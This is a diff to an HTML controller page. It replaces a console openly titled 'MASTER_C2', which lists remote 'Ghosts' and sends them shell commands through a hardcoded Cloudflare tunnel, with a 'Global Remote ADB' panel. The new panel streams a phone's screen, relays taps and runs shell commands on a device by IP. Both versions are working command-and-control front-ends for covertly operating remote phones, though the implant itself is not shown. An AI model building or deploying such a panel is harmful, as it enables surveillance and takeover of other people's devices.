--- a/controller.html
+++ b/controller.html
@@ -1,46 +1,57 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>ARODEN_OS | MASTER_C2</title>
-    <script src="https://cdn.socket.io/4.7.2/socket.io.min.js"></script>
+    <title>Global Remote ADB</title>
     <style>
-        body { background: #010204; color: #00ff9d; font-family: 'Courier New', monospace; margin: 20px; }
-        #terminal { height: 400px; border: 1px solid #00ff9d; background: #000; overflow-y: auto; padding: 10px; color: #fff; margin-top: 10px; }
-        .node-list { display: flex; gap: 10px; margin-bottom: 20px; }
-        .node { border: 1px solid #555; padding: 10px; cursor: pointer; }
-        .node.active { border-color: #ff00ff; box-shadow: 0 0 10px #ff00ff; }
-        input { width: 100%; background: transparent; border: 1px solid #00ff9d; color: #00e5ff; padding: 10px; outline: none; }
+        body { background: #0f172a; color: white; display: flex; font-family: sans-serif; padding: 20px; gap: 20px; }
+        #screen-container { position: relative; border: 4px solid #334155; border-radius: 10px; cursor: crosshair; }
+        #screen-img { max-width: 350px; display: block; }
+        .panel { flex: 1; }
+        #log { background: #000; color: #10b981; padding: 15px; height: 250px; overflow-y: auto; font-family: monospace; border-radius: 8px; }
+        input, button { width: 100%; padding: 12px; margin-top: 10px; border-radius: 5px; border: none; font-weight: bold; }
+        button { background: #38bdf8; cursor: pointer; }
     </style>
 </head>
 <body>
-    <h2>[ CENTRAL_COMMAND_V27 ]</h2>
-    <div id="nodes" class="node-list">Scanning for active Ghosts...</div>
-    
-    <div id="terminal">>> Awaiting Node Selection...</div>
-    <input type="text" id="cmd" placeholder="Execute command (e.g. ls, reboot, input tap x y)">
+    <div id="screen-container">
+        <img id="screen-img" src="" onclick="sendTouch(event)">
+    </div>
+    <div class="panel">
+        <h2>Remote Controller</h2>
+        <input type="text" id="ip" placeholder="Phone IP">
+        <button onclick="toggleStream()">Start/Stop Stream</button>
+        <div id="log">--- Logs ---</div>
+        <input type="text" id="cmd" placeholder="Shell Command (e.g. input keyevent 3)">
+        <button onclick="runCmd()" style="background: #a855f7;">Execute</button>
+    </div>
 
-    <script>
-        const SERVER_URL = "https://administered-mhz-spas-structural.trycloudflare.com";
-        const socket = io(SERVER_URL);
-        let activeId = "";
+<script>
+    const socket = new WebSocket('wss://your-tunnel.trycloudflare.com');
+    let streaming = false;
 
-        socket.on('update_dashboard', (list) => {
-            const nodes = document.getElementById('nodes');
-            nodes.innerHTML = list.map(n => `<div class="node ${activeId===n.id?'active':''}" onclick="activeId='${n.id}'">${n.info}</div>`).join('');
-        });
+    socket.onmessage = (e) => {
+        const res = JSON.parse(e.data);
+        if(res.type === 'SCREEN') document.getElementById('screen-img').src = "data:image/png;base64," + res.data;
+        if(res.type === 'RESULT') document.getElementById('log').innerText += "\n> " + res.data;
+    };
 
-        document.getElementById('cmd').onkeypress = (e) => {
-            if(e.key === 'Enter' && activeId) {
-                socket.emit('admin_cmd', { targetId: activeId, cmd: e.target.value });
-                e.target.value = "";
-            }
-        };
+    function toggleStream() {
+        streaming = !streaming;
+        if(streaming) {
+            setInterval(() => { if(streaming) socket.send(JSON.stringify({type:'REQUEST_SCREEN', ip: document.getElementById('ip').value})); }, 1500);
+        }
+    }
 
-        socket.on('term_log', (log) => {
-            const term = document.getElementById('terminal');
-            term.innerHTML += `<br>${log}`;
-            term.scrollTop = term.scrollHeight;
-        });
-    </script>
+    function sendTouch(e) {
+        const img = document.getElementById('screen-img');
+        const x = Math.round((e.offsetX / img.clientWidth) * 1080); // ফোনের রেজোলিউশন অনুযায়ী অ্যাডজাস্ট করুন
+        const y = Math.round((e.offsetY / img.clientHeight) * 2400); 
+        socket.send(JSON.stringify({type: 'TOUCH', ip: document.getElementById('ip').value, x, y}));
+    }
+
+    function runCmd() {
+        socket.send(JSON.stringify({type: 'COMMAND', ip: document.getElementById('ip').value, cmd: document.getElementById('cmd').value}));
+    }
+</script>
 </body>
 </html>
